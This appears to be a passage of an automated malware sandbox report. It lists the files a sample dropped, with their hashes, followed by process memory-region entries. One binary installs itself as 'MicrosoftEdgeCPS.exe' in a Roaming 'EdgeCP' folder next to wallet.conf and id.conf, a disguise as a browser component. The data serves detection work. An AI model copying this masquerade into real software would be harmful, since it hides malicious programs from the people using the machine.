SHA135269eb1e79b954d89bc2850d1ac456b35711690
SHA2562bc84dddbfa1ae9bb8cdcd46bfec4189bf392a58eedfca71e274adf5e5a7ddbe
SHA512f4b6dfd18b7e7bc3e43af65bd431167c3d7ef3383a55a70ba87d25c6a591593a431fc41b6b69f6cf74ba44b8f1b5008252234d2727dda7af8b102761414b9781
-
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exeMD5
bcc624fbcc3f06e8b80bb2ed4b065af6
SHA135269eb1e79b954d89bc2850d1ac456b35711690
SHA2562bc84dddbfa1ae9bb8cdcd46bfec4189bf392a58eedfca71e274adf5e5a7ddbe
SHA512f4b6dfd18b7e7bc3e43af65bd431167c3d7ef3383a55a70ba87d25c6a591593a431fc41b6b69f6cf74ba44b8f1b5008252234d2727dda7af8b102761414b9781
-
C:\Users\Admin\AppData\Local\Temp\Unknown.dllMD5
86114faba7e1ec4a667d2bcb2e23f024
SHA1670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f
-
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Local\Temp\unk.xmlMD5
77e6621fd939338d3f19f3dd948ecf43
SHA153df8b3a76c5d6c35a99aa7759ff3bd7ec46588c
SHA2569cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867
SHA5126e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.confMD5
f19bdcbc1a6d4c0b122d652870ed1155
SHA1a8726e6942dc5821afd9399170b9e3dbbeec46c9
SHA256a03c9f063d1ddfbf4a657d055e45224b758dcb171bd2a10a7e67598a15026a07
SHA51291174413685307813aa4daa012d73bb0339609f79e42866e4fb9c64e7de5d8d83b33dc30779ff86e75c85a186502e440eb2e41375f6f6c36cfaa3cda54674fd2
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.confMD5
69bf7238c8e32793411515d8ca5926a9
SHA1d6918bcceab927a036b760a82cadd340d83b8ed1
SHA25657df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
SHA5124a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
\Users\Admin\AppData\Local\Temp\Unknown.dllMD5
86114faba7e1ec4a667d2bcb2e23f024
SHA1670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f
-
memory/416-256-0x0000000004D30000-0x000000000522E000-memory.dmpFilesize
5.0MB
-
memory/416-255-0x0000000004D30000-0x000000000522E000-memory.dmpFilesize
5.0MB
-
memory/416-252-0x0000000000000000-mapping.dmp
-
memory/492-198-0x00000000093B0000-0x00000000093E3000-memory.dmpFilesize
204KB
-
memory/492-213-0x00000000098E0000-0x00000000098E1000-memory.dmpFilesize
4KB
-
memory/492-209-0x000000007EE10000-0x000000007EE11000-memory.dmpFilesize
4KB
-
memory/492-158-0x0000000004B70000-0x0000000004B71000-memory.dmpFilesize
4KB
-
memory/492-160-0x0000000004B72000-0x0000000004B73000-memory.dmpFilesize
4KB
-
memory/492-211-0x00000000094F0000-0x00000000094F1000-memory.dmpFilesize
4KB
-
memory/492-174-0x0000000007D20000-0x0000000007D21000-memory.dmpFilesize
4KB
-
memory/492-215-0x0000000004B73000-0x0000000004B74000-memory.dmpFilesize
4KB
-
memory/492-149-0x0000000000000000-mapping.dmp
-
memory/492-165-0x0000000007570000-0x0000000007571000-memory.dmpFilesize
4KB
-
memory/492-167-0x0000000007E60000-0x0000000007E61000-memory.dmpFilesize
4KB
-
memory/492-169-0x0000000007C80000-0x0000000007C81000-memory.dmpFilesize
4KB
-
memory/492-171-0x0000000007F10000-0x0000000007F11000-memory.dmpFilesize
4KB
-
memory/492-205-0x00000000086E0000-0x00000000086E1000-memory.dmpFilesize
4KB
-
memory/580-162-0x0000000000000000-mapping.dmp
-
memory/580-220-0x0000000000401074-mapping.dmp
-
memory/580-222-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/640-216-0x00000000004466F4-mapping.dmp
-
memory/640-182-0x0000000000000000-mapping.dmp
-
memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/688-195-0x0000000000000000-mapping.dmp
-
memory/740-126-0x00000000011C0000-0x0000000001225000-memory.dmpFilesize
404KB
-
memory/740-114-0x00000000008E0000-0x00000000008E1000-memory.dmpFilesize
4KB
-
memory/740-116-0x00000000058D0000-0x00000000058D1000-memory.dmpFilesize
4KB
-
memory/740-117-0x0000000005320000-0x0000000005321000-memory.dmpFilesize
4KB
-
memory/740-118-0x0000000002E30000-0x0000000002EC2000-memory.dmpFilesize
584KB
-
memory/740-119-0x0000000002EA0000-0x0000000002EA1000-memory.dmpFilesize
4KB
-
memory/740-120-0x0000000002E30000-0x0000000002EC2000-memory.dmpFilesize
584KB
-
memory/740-121-0x0000000008930000-0x0000000008AD4000-memory.dmpFilesize
1.6MB
-
memory/904-145-0x0000000000000000-mapping.dmp
-
memory/1164-250-0x0000000000000000-mapping.dmp
-
memory/1216-251-0x0000000000000000-mapping.dmp
-
memory/1272-238-0x0000000000401108-mapping.dmp
-
memory/1272-241-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1284-246-0x0000000000000000-mapping.dmp
-
memory/1512-249-0x0000000000000000-mapping.dmp
-
memory/2216-134-0x00000000008D9FE0-mapping.dmp
-
memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmpFilesize
4.9MB
-
memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmpFilesize
4.9MB
-
memory/2232-173-0x0000000000000000-mapping.dmp
-
memory/2308-234-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/2308-232-0x0000000000401000-mapping.dmp
-
memory/2360-247-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2360-242-0x0000000000401000-mapping.dmp
-
memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2516-226-0x0000000000413E10-mapping.dmp
-
memory/2532-212-0x0000000000000000-mapping.dmp
-
memory/2532-181-0x0000000000000000-mapping.dmp
-
memory/2820-248-0x0000000000000000-mapping.dmp
-
memory/2864-187-0x0000000000000000-mapping.dmp
-
memory/2948-245-0x0000000000000000-mapping.dmp
-
memory/3036-176-0x0000000007DC0000-0x0000000007DC1000-memory.dmpFilesize
4KB
-
memory/3036-156-0x0000000006E60000-0x0000000006E61000-memory.dmpFilesize
4KB
-
memory/3036-197-0x0000000008AF0000-0x0000000008AF1000-memory.dmpFilesize
4KB
-
memory/3036-192-0x0000000009540000-0x0000000009541000-memory.dmpFilesize
4KB
-
memory/3036-179-0x0000000007E90000-0x0000000007E91000-memory.dmpFilesize
4KB
-
memory/3036-148-0x0000000000000000-mapping.dmp
-
memory/3036-155-0x00000000042D0000-0x00000000042D1000-memory.dmpFilesize
4KB
-
memory/3036-161-0x0000000006822000-0x0000000006823000-memory.dmpFilesize
4KB
-
memory/3036-159-0x0000000006820000-0x0000000006821000-memory.dmpFilesize
4KB
-
memory/3036-223-0x0000000006823000-0x0000000006824000-memory.dmpFilesize
4KB
-
memory/3128-139-0x00000000006FC1D0-mapping.dmp
-
memory/3128-144-0x0000000000400000-0x00000000006FE000-memory.dmpFilesize
3.0MB
-
memory/3128-138-0x0000000000400000-0x00000000006FE000-memory.dmpFilesize
3.0MB
-
memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/3140-128-0x00000000007E2730-mapping.dmp
-
memory/3856-240-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/3856-235-0x00000000004010B8-mapping.dmp
-
memory/3980-130-0x0000000000000000-mapping.dmp
-
memory/4024-229-0x000000000044412E-mapping.dmp
-
memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB